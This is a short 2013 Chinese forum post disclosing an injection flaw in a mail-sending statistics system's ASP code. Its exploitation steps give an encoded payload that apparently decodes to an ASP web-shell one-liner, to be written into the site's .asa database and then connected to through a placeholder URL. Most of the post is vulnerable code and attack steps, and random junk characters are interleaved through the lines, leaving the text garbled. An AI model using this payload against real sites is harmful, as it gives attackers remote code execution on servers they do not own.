找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2133|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp
" O- t6 z6 k$ V) \  Y% ?: t+ t6 T  X! Z
IF Request.QueryString("Action")="del" Then
7 W6 l! H4 X$ U( F& T0 l  L* ^/ A3 JID=Request.QueryString("ID")
% N* V$ x" T4 ~. ]% W; C3 a1 MIF Countss ("tui","Fenlei",ID )<>0 then
! o3 h/ o% {" l0 U' q$ s! [2 l'略 4 |5 I) Y1 C' r& K9 Q. q
IF Request.QueryString("Action")="Add" Then 2 m  c5 C4 s/ r
Tname=Request.Form("Typename") $ U: l, t1 F+ d8 d7 Y# i
Set Rs=Server.CreateObject("adodb.Recordset")
# L  D1 t: U" b) r# b( x) a; eSql="Select * From Fenlei Order by id Desc " 1 M9 H1 W* c4 G% r% t3 K
Rs.Open Sql,Conn,1,3 # m- n/ ^0 @: y' ^3 U& R# {
Rs.Addnew : P6 W* o1 J4 k5 t
Rs("Typename")=Tname
/ `6 u3 @, g( }" t8 n+ l. Q( L'略 5 h, k$ \% g/ r( I# h8 F% w
Set Rs=Server.CreateObject("adodb.Recordset")
, B# T+ D4 {2 H9 x! D: MSql="Select * From Fenlei Order by id Desc " ' c5 [) R& O) V6 n9 N) ?
Rs.Open Sql,Conn,1,1 ' C+ {  G* _# Z, G" P. C, C
'略 # k: ~& y, g7 X$ S( }
%>
) b; }1 l) l, M+ U6 n3 o 1 D- w7 S2 [& x" r; {

! F: E2 G4 }: ^% T# ` + p1 b+ p7 v6 a; ]  w! L; o* m" p
没有过滤,直接写入数据库。
. u; C. T! ]- \. G  Y5 a' {" i 3 d" U+ J$ ^' W2 i8 V4 \  z2 V; o
利用方法:
' a; P, q" q! `) u$ \ 4 T# C2 H* Z" J& j9 C/ c9 q
插入:┼攠數畣整爠煥敵瑳∨≡┩>
. T; Y% B* R; T) y4 ?/ r
3 n# K' S* P, m# d5 @" f
; B; ?0 y+ v! N7 E" z! T/ h连接: http://www.xxx.com/###tongbaner.asa
% r* B9 _1 l8 S! @. A: ^4 |' |2 f'默认安装文件:
, L* N! J3 a3 @. r. l'install.asp
7 q' r, B- z: {' z2 T: [7 ?& }
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表